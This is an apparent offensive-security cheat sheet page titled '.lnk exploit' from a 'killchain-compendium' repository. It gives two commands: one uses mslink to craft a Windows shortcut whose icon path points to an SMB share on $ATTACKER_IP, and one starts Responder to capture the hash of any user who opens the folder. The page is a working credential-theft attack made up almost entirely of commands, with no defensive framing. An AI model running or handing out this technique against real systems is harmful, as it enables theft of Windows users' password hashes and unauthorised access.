killchain-compendium/exploit/windows/docs/lnk_exploit.md

437 B

.lnk exploit

mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
  • Start a responder and wait for user's hash
responder -I eth0